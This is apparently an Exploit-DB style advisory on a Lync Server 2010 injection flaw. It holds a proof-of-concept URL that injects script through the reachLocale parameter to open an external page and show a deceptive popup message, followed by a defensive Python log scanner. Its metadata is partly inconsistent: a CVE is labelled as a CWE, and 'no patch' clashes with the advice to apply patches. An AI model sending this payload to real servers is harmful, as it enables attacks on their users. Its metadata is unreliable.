Vendor: Microsoft Lync Server 2010
By: Unknown
CVSS: 7.5 (HIGH)
Type: Remote Command-Injection
CWE: 78
Product Name: Microsoft Lync Server 2010
Affected Version From: 4.0.7577.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2011-2010
CPE: a:microsoft:lync_server:2010
Platforms Tested: Windows

Microsoft Lync Server 2010 Remote Command-Injection Vulnerability

Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands in the context of the application.

Mitigation:

Apply the necessary patches provided by Microsoft to address this vulnerability.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48235/info

Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. 

https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//
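A defender can look for requests of this shape in web server logs by checking whether the reachLocale parameter of ReachJoin.aspx is anything other than a plain locale tag. The following is an added example, not part of the original advisory; the log layout, the locale pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate reachLocale is a plain language tag such as "en-us".
LOCALE_RE = re.compile(r"[A-Za-z]{2,3}(?:-[A-Za-z0-9]{2,8}){0,3}")
TARGET_PATH = "/reach/client/webpages/reachjoin.aspx"  # compared case-insensitively

def suspicious_reach_locale(target):
    """Return the decoded reachLocale value if it is not a plain locale tag."""
    parts = urlsplit(target)
    if parts.path.lower() != TARGET_PATH:
        return None
    # Split by hand on "&" only, so a ";" inside the value is never treated
    # as a parameter separator.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() != "reachlocale":
            continue
        value = unquote_plus(raw)
        if value and not LOCALE_RE.fullmatch(value):
            return value
    return None

def scan(log_lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue  # not in the assumed layout
        value = suspicious_reach_locale(fields[3])
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log; assumed layout: date time method request-target status
SAMPLE_LOG = [
    "2011-06-14 10:02:11 GET /Reach/Client/WebPages/ReachJoin.aspx?xml=&reachLocale=en-us 200",
    "2011-06-14 10:02:40 GET /Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20x=1// 200",
    "2011-06-14 10:03:05 GET /Reach/Client/WebPages/ReachJoin.aspx?xml=&reachLocale=pt-BR 200",
    "2011-06-14 10:03:30 GET /Other/Page.aspx?reachLocale=%22;x// 200",
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-locale reachLocale value {value!r}")
```

The same allow-list pattern is the shape of the server-side fix: accept reachLocale only when it matches a locale tag, and reject or default everything else before it reaches the page.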